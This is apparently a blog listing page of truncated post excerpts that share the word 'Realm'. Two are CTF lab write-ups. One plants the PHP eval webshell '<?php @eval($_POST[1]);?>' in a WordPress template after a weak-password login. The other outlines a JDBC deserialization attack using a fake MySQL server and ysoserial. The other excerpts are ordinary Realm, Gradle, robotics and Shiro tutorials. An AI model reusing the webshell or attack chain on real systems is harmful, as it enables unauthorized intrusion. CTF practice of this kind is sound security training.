Spring and Autumn Cloud Realm 2022 Netding Cup Semi-finals-WP [over and over again]

flag01 Scan with fscan wordpress, open http://39.99.137.31/wp-admin Weak password login background admin 123456 Modify 404.php in the template <?php @eval($_POST[1]);?> It’s really annoying to always get this error report. It turned out to be the ** campus network, but later I just changed the hotspot. Ant Sword Connection http://39.99.228.196/wp-content/themes/twentytwentyone/footer.php Get the flag in the root […]

Spring and Autumn Cloud Realm Exchange-WP [over and over again]

flag01 fscan scan Open port 8000 and log in at admin/123456 Official plug-in (upper right corner) -> Huaxia ERP, find loopholes, you can hit jdbc Create a malicious mysql on vps –>https://github.com/fnmsd/MySQL_Fake_Server Download the ysoserial jar package and put it in the server.py directory –> https://github.com/frohoff/ysoserial/releases Modify config.json ①The ip and port in base64 need […]

AS Gradle 8.0 configuration + Realm usage

Directory Gradle overview AS Gradle 8.0 configuration instructions 1) Project settings.gradle 2) Project build.gradle 3) Submodule hawkysdk-realm 3.1 build.gradle 3.2 Realm table 3.3 Realm Dao 3.4 RealmCallback DB operation callback 3.5 HawkyRealm DB configuration initialization 4) Submodule app 4.1 build.gradle 4.2 Realm Application 4.3 User entity class 4.4 MainActivity test class 4.5 activity_main layout file […]

[Android — open source library] Basic use of database Realm

Introduction Realm is an MVCC (multi-version concurrency control) database, released by Y Combinator in July 2014 as an embedded database that supports running on mobile phones, tablets and wearable devices, with the goal of replacing SQLite. Realm is essentially an embedded database, not built on top of SQLite. It has its own database storage engine, […]

Realman’s ultra-lightweight humanoid robotic arm–Realsense D435 hand-eye calibration

Directory 1. Environmental requirements 2. Overview 3. Prepare before starting 4. aruco_ros configuration 5. easy_handeye configuration 6. Start the relevant launch file to start calibration 1. Environmental requirements This tutorial mainly introduces the configuration and method of hand-eye calibration between the RM robotic arm and the Realsense D435 camera. Since different processor architectures have differences […]

JDBCRealm and custom Realm

Shiro uses its own IniRealm by default, and IniRealm reads user information from the ini configuration file. In most cases, user information needs to be read from the system database, so you need to use JDBCRealm or custom Realm 6.1 Implementation 1 (using JDBCRealm to provide data sources to achieve authentication): 1) Create a users […]